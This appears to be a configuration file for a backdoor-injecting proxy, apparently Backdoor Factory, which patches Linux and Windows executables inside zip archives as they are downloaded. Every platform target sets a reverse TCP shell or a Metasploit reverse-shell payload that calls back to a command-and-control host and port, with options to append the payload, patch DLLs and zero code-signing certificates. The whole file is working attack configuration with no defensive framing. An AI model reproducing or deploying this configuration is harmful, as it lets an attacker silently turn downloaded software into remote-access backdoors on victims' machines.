[ZIP]
# patchCount is the max number of files to patch in a zip file
# After the max is reached it will bypass the rest of the files 
# and send on it's way

patchCount = 5

# In Bytes
maxSize = 40000000

blacklist = .dll,  #don't do dlls in a zip file

[targets]
	#MAKE SURE that your settings for host and port DO NOT
	# overlap between different types of payloads
	
	[[ALL]] # DEFAULT settings for all targets REQUIRED
	
	LinuxType = ALL 	# choices: x86/x64/ALL/None
	WindowsType = ALL 	# choices: x86/x64/ALL/None
	
	FileSizeMax = 50000000  # ~50 MB (just under) No patching of files this large

		[[[LinuxIntelx86]]]
		SHELL = reverse_shell_tcp   # This is the BDF syntax
		HOST = 192.168.1.168 		# The C2
		PORT = 8888
		SUPPLIED_SHELLCODE = None
		MSFPAYLOAD = linux/x86/shell_reverse_tcp	# MSF syntax
		
		[[[LinuxIntelx64]]]
		SHELL = reverse_shell_tcp
		HOST = 192.168.10.4
		PORT = 6666
		SUPPLIED_SHELLCODE = None
		MSFPAYLOAD = linux/x64/shell_reverse_tcp

		[[[WindowsIntelx86]]]
		PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
		HOST = 192.168.10.4
		PORT = 6666
		SHELL = iat_reverse_tcp
		SUPPLIED_SHELLCODE = None
		ZERO_CERT = False
		PATCH_DLL = True
		MSFPAYLOAD = windows/shell_reverse_tcp

		[[[WindowsIntelx64]]]
		PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
		HOST = 192.168.1.16
		PORT = 8088
		SHELL = reverse_shell_tcp
		SUPPLIED_SHELLCODE = None
		ZERO_CERT = True
		PATCH_DLL = False
		MSFPAYLOAD = windows/x64/shell_reverse_tcp
